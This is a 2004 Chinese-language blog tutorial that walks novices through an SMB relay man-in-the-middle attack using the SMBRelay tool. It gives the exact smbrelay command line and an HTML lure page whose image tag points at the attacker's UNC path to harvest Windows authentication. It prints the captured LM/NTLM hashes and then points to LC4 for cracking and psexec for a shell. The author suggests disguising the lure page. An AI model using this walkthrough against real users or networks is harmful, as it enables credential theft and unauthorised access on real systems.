使用smbrelay进行中间人攻击 |
Submitted by 云舒 on 2004, July 7, 3:16 PM. 技术 |
最近使用smbrelay进行攻击很流行,我也赶时髦测试了一下,感谢xx2同志提高肉鸡,确实是个好同志呀。在这里,我就不写理论知识了,仅仅简单描述我的步骤,使比我还菜的鸟也能够一见中间人攻击的庐山真面目,现在简述如下: 1.虽然使用smbrelay攻击只需要2台机子,一台受害者A,一台攻击者B,但是却需要3个IP地址进行攻击。所以,要在控制面版中间再填加 一个ip地址C,IP地址C要和IP地址B在同个网段。为了避免IP地址冲突,要选择一个没有使用的IP地址。我是使用superscan扫描整个C类地 址,只ping就可以了。在这里,我的IP地址,也就是攻击者为XXX.92.45.18,虚拟的IP地址为XXX.92.45.19,受害者,也就是 xx2同志的IP地址是YYY.93.113.203。为了避免不必要的麻烦,我把IP地址都做了处理,这样,你好我也好!!:) 2.然后,使用smbrelay /E列举网卡,这里为1000004,然后输入C:/WINNT/system32/system/tools>smbrelay /D 1 /IL 1000004 /IR 1000004 /L+ XXX.92.45.19 /R- XXX.92.45.19,其中/D为纠错等级,我这样翻译它吧,英语烂。默认是0,我用的1,中庸之道。/IL和/IR都是写网卡编号。/L+和/R- 是那个虚拟的ip地址c。显示如下: C:/WINNT/system32/system/tools>smbrelay /D 1 /IL 1000004 /IR 1000004 /L+ XXX.92.45.19 /R- XXX.92.45.19 SMBRelay v0.981 - TCP (NetBT) level SMB man-in-the-middle relay attack Copyright 2001: Sir Dystic, Cult of the Dead Cow Send complaints, ideas and donations to sirdystic@cultdeadcow.com Using local adapter index 1000004: Intel(R) PRO Adapter Error 52 adding IP address to interface 1000004: 网络上已有重复的名称 3.作好一个烂网页,代码如下: < html> < head> < title>hash < /head> < body> < img src="file://XXX.92.45.19/c$/hash.jpg"> < /body> < /html> 其中XXX.92.45.19为你的虚拟ip。现在等受害者来访问它了,你就可以抓到它的LM hash和NTLM hash了,然后用lc4破解。其实这个页面你可以做的更好,让别人看不出来,这里我仅仅测试,就不用伪装了。听别人说可以直接net use:/XXX.92.45.19,还可以用psexec获得SHELL,我没有psexec,没有测试。 但是测试net use的时候显示: C:/>net use /XXX.92.45.19 系统发生67错误 找不到网络路径 我也不知道为什么,哎……技术太菜了。抓的hash会以txt格式保存在smbrelay的目录里面。我得到的屏幕显示如下: C:/WINNT/system32/system/tools>smbrelay /D 1 /IL 1000004 /IR 1000004 /L+ XXX.92.45.19 /R- XXX.92.45.19 SMBRelay v0.981 - TCP (NetBT) level SMB man-in-the-middle relay attack Copyright 2001: Sir Dystic, Cult of the Dead Cow Send complaints, ideas and donations to sirdystic@cultdeadcow.com Using local adapter index 1000004: Intel(R) PRO Adapter Error 52 adding IP address to interface 1000004: 网络上已有重复的名称 Bound to port 139 on address XXX.92.45.19 Connection from YYY.93.113.203:2510 Request type: Session Request 72 bytes Source name: JIANHUFENG <00> Target name: *SMBSERVER <20> Setting target name to source name and source name to 'CDC4EVER'... Response: Positive Session Response 4 bytes Request type: Session Message 137 bytes SMB_COM_NEGOTIATE Response: Session Message 123 bytes Challenge (8 bytes): 726C02A8799402E7 Request type: Session Message 200 bytes SMB_COM_SESSION_SETUP_ANDX Password lengths: 1 0 Username: "" Domain: "" OS: "" Lanman type: "" ???: "" Response: Session Message 154 bytes OS: "Windows 5.0" Lanman type: "Windows 2000 LAN Manager" Domain: "WORKGROUP" Request type: Session Message 108 bytes SMB_COM_TRANSACTION2 Response: Session Message 39 bytes Request type: Session Message 274 bytes SMB_COM_SESSION_SETUP_ANDX Password lengths: 24 24 Case insensitive password: 780FAB7048A77950377C354428046698E94D34857E359CC3 Case sensitive password: F3AD285B79DACDB857763ED78FA71B4CE0E4CE83C413D4FF Username: "Guest" Domain: "JIANHUFENG" OS: "Windows 2000 2195" Lanman type: "Windows 2000 5.0" ???: "" Response: Session Message 154 bytes OS: "Windows 5.0" Lanman type: "Windows 2000 LAN Manager" Domain: "WORKGROUP" Password hash written to disk Connected? Bound to port 139 on address XXX.92.45.19 relaying for host JIANHUFENG YYY.93.113.203 PS:我写这个文章的目的是因为有的人会这个,但是他们认为菜鸟不应该掌握这个,我很不爽,呵呵。本文参考了我们幻影的ciel的文章,它的文章发表在安全焦点http://www.xfocus.net/articles/200305/538.html ,大家可以去看看,他讲了很多理论知识的哦…… 好了,我是灰色轨迹的云舒,欢迎大家转载,但是请保留出处,谢谢了。灰色轨迹地址http://www.isgrey.com ,我的邮箱wustyunshu@hotmail.com |
使用smbrelay进行中间人攻击
最新推荐文章于 2024-01-16 16:44:51 发布